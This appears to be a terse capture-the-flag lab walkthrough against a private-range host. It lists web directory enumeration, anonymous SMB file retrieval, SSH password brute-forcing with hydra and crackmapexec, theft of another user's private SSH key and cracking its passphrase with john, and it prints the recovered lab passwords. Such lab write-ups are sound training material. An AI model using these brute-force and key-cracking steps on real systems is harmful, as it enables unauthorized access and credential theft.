ENUM
bash
- gobuster dir -u http://10.10.108.101/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x md,txt -t 30 -o gobust_root.txt
/development
- dev.txt -> struts / REST v2.5.12 (https://www.exploit-db.com/exploits/42627 ?)
- j.txt -> J has a weak password
SMB
plaintext
- smbclient -U '' //10.10.108.101/Anonymous
- get staff.txt
users:
Jan
Kay
SSH
plaintext
- crackmapexec ssh 10.10.108.101 -u jan -p /usr/share/wordlists/rockyou.txt
OR:
- hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.108.101 -t 4 ssh
[22][ssh] host: 10.10.108.101 login: jan password: armando
PRIVESC
plaintext
- cat /home/kay/.ssh/id_rsa -> kay_id_rsa
- python /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
- john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash
beeswax
SSH to get pass.bak
plaintext
cat /home/kay/pass.bak -> heresareallystrongpasswordthatfollowsthepasswordpolicy$$